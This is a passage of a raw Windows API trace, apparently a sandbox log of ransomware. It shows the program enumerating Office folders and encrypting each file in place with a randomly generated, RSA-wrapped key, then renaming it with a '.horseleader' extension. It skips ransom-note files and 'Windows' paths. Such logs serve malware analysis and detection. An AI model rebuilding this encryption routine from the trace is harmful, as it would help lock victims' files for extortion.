lpNewFilePointer=0x0) returned 1 [0244.316] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.316] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.316] CloseHandle (hObject=0x158) returned 1 [0244.317] GetProcessHeap () returned 0x780000 [0244.317] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.317] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL.horseleader") returned 83 [0244.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muoptin.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muoptin.dll.horseleader")) returned 1 [0244.318] GetProcessHeap () returned 0x780000 [0244.318] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.318] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x161d5800, ftCreationTime.dwHighDateTime=0x1cbd856, ftLastAccessTime.dwLowDateTime=0xd63a22c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x161d5800, ftLastWriteTime.dwHighDateTime=0x1cbd856, nFileSizeHigh=0x0, nFileSizeLow=0x38d88, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Oarpmany.exe", cAlternateFileName="")) returned 1 [0244.318] lstrcmpiW (lpString1="Oarpmany.exe", lpString2="Windows") returned -1 [0244.318] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe") returned 72 [0244.318] StrStrIW (lpFirst="Oarpmany.exe", lpSrch=".horseleader") returned 0x0 [0244.318] lstrcmpW (lpString1="Oarpmany.exe", lpString2="#Decrypt#.txt") returned 1 [0244.318] lstrcmpW (lpString1="Oarpmany.exe", lpString2="_uninstalling_.png") returned 1 [0244.318] lstrlenW (lpString=".testttjffg") returned 11 [0244.318] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe", lpSrch=".testttjffg") returned 0x0 [0244.318] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.319] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.319] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\oarpmany.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.320] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe") returned 72 [0244.320] StrStrW (lpFirst="Oarpmany.exe", lpSrch=".txt") returned 0x0 [0244.320] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=232840) returned 1 [0244.320] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.320] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.324] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.324] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.325] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x19ec4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.325] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.325] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.325] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.325] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x33d88, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.325] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.327] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.328] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.328] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.328] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.328] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.328] CloseHandle (hObject=0x158) returned 1 [0244.328] GetProcessHeap () returned 0x780000 [0244.328] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.328] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe.horseleader") returned 84 [0244.329] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\oarpmany.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\oarpmany.exe.horseleader")) returned 1 [0244.330] GetProcessHeap () returned 0x780000 [0244.330] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.330] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f9d2900, ftCreationTime.dwHighDateTime=0x1cab9ac, ftLastAccessTime.dwLowDateTime=0xbe0f9da0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7f9d2900, ftLastWriteTime.dwHighDateTime=0x1cab9ac, nFileSizeHigh=0x0, nFileSizeLow=0x7568, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ODBCMON.DLL", cAlternateFileName="")) returned 1 [0244.330] lstrcmpiW (lpString1="ODBCMON.DLL", lpString2="Windows") returned -1 [0244.330] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL") returned 71 [0244.330] StrStrIW (lpFirst="ODBCMON.DLL", lpSrch=".horseleader") returned 0x0 [0244.330] lstrcmpW (lpString1="ODBCMON.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.330] lstrcmpW (lpString1="ODBCMON.DLL", lpString2="_uninstalling_.png") returned 1 [0244.330] lstrlenW (lpString=".testttjffg") returned 11 [0244.330] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL", lpSrch=".testttjffg") returned 0x0 [0244.330] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.330] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.330] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\odbcmon.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.331] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL") returned 71 [0244.331] StrStrW (lpFirst="ODBCMON.DLL", lpSrch=".txt") returned 0x0 [0244.331] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=30056) returned 1 [0244.331] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.334] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.334] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.337] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2568, lpOverlapped=0x0) returned 1 [0244.338] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffda98, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.338] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2568, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2568, lpOverlapped=0x0) returned 1 [0244.338] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.338] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.338] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.338] CloseHandle (hObject=0x158) returned 1 [0244.339] GetProcessHeap () returned 0x780000 [0244.339] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.339] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL.horseleader") returned 83 [0244.339] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\odbcmon.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\odbcmon.dll.horseleader")) returned 1 [0244.340] GetProcessHeap () returned 0x780000 [0244.340] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.340] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbe974c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbe974c00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Office Setup Controller", cAlternateFileName="OFFICE~1")) returned 1 [0244.340] lstrcmpiW (lpString1="Office Setup Controller", lpString2="Windows") returned -1 [0244.340] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller") returned 83 [0244.340] lstrcmpW (lpString1="Office Setup Controller", lpString2=".") returned 1 [0244.340] lstrcmpW (lpString1="Office Setup Controller", lpString2="..") returned 1 [0244.340] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.340] GetProcessHeap () returned 0x780000 [0244.340] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.340] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\*") returned 85 [0244.340] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbe974c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbe974c00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0244.343] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.343] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\.") returned 85 [0244.343] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.343] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbe974c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbe974c00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="..", cAlternateFileName="")) returned 1 [0244.344] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.344] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\..") returned 86 [0244.344] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.344] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.344] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17bd2750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0244.344] lstrcmpiW (lpString1="Access.en-us", lpString2="Windows") returned -1 [0244.344] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us") returned 96 [0244.347] lstrcmpW (lpString1="Access.en-us", lpString2=".") returned 1 [0244.347] lstrcmpW (lpString1="Access.en-us", lpString2="..") returned 1 [0244.347] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.348] GetProcessHeap () returned 0x780000 [0244.348] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0244.348] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\*") returned 98 [0244.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17bd2750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.351] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.351] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\.") returned 98 [0244.351] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.351] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17bd2750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="..", cAlternateFileName="")) returned 1 [0244.351] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.351] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\..") returned 99 [0244.351] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.351] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.351] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa5fe940, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x15419830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="AccessMUI.XML", cAlternateFileName="ACCESS~1.XML")) returned 1 [0244.351] lstrcmpiW (lpString1="AccessMUI.XML", lpString2="Windows") returned -1 [0244.351] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 110 [0244.351] StrStrIW (lpFirst="AccessMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.352] lstrcmpW (lpString1="AccessMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.352] lstrcmpW (lpString1="AccessMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.352] lstrlenW (lpString=".testttjffg") returned 11 [0244.352] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.352] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.352] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.353] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 110 [0244.353] StrStrW (lpFirst="AccessMUI.XML", lpSrch=".txt") returned 0x0 [0244.353] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1349) returned 1 [0244.353] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x545, lpOverlapped=0x0) returned 1 [0244.355] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffabb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.355] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x545, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x545, lpOverlapped=0x0) returned 1 [0244.355] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.355] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.356] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.356] CloseHandle (hObject=0x15c) returned 1 [0244.356] GetProcessHeap () returned 0x780000 [0244.356] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.356] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.horseleader") returned 122 [0244.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.horseleader")) returned 1 [0244.357] GetProcessHeap () returned 0x780000 [0244.357] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.357] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="AccessMUISet.XML", cAlternateFileName="ACCESS~2.XML")) returned 1 [0244.357] lstrcmpiW (lpString1="AccessMUISet.XML", lpString2="Windows") returned -1 [0244.357] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 113 